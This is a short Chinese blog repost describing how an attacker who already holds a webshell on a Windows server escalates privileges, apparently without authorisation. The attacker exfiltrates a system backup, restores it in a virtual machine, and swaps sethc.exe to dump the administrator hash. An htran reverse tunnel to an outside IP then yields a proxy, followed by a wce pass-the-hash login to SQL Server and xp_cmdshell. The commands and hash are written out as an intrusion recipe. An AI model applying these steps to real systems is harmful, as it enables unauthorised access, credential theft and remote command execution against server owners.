猪三哥那看到的,再次验证渗透玩的是思路,学习下 一頭豬,搞到WEBSHELL~補丁很全,無神馬缺陷,裝了個微軟FTP,SQL2005,常規辦法無法提權,~一看D盤有一個前天的系統BKF文件~啊哦~COPY 到WEB 目錄下回來~裝個虛擬豬還原BKF文件~稍等片刻之後,虛擬豬就變成目標豬的系統了~無密碼登入呢~插入WINPE光盤~替換sethc.exe ,重啟,按5次shift,新建帳號進入~抓hash,不幸的是超過14位,無法破解~等死嗎?肯定不能啦~既然有目標豬的hash了,還能死嗎? OK,本地執行htran -s -listen 1234 5200,webshell執行htran -s -connect 222.222.222.222 1234 當然了,目標豬是可以上網的,OK 得到一條SOCK5代理,222.222.222.222:5200 本地設置ProxyCap允許所有程序通過此代理連接,然後wce.exe -s administrator:zhu:00000000000000000000000000000000:4A59CF37F6A2307D14ABA1921E8BBFE6 替換HASH 不要想著直接ipc,即使設置所有程序通過代理連接,也掛不到系統核心的那些XX程式,打開SQL Server Management Studio,填寫目標豬IP,選擇WINDOWS認證,OK,成功登陸目標的SQL,然後就是神馬exec master..xp_cmdshell 神馬豬的了~ 摘自 RoGe's Blog |
另类提权 虚拟机还原备份文件抓hash
最新推荐文章于 2024-09-27 21:41:13 发布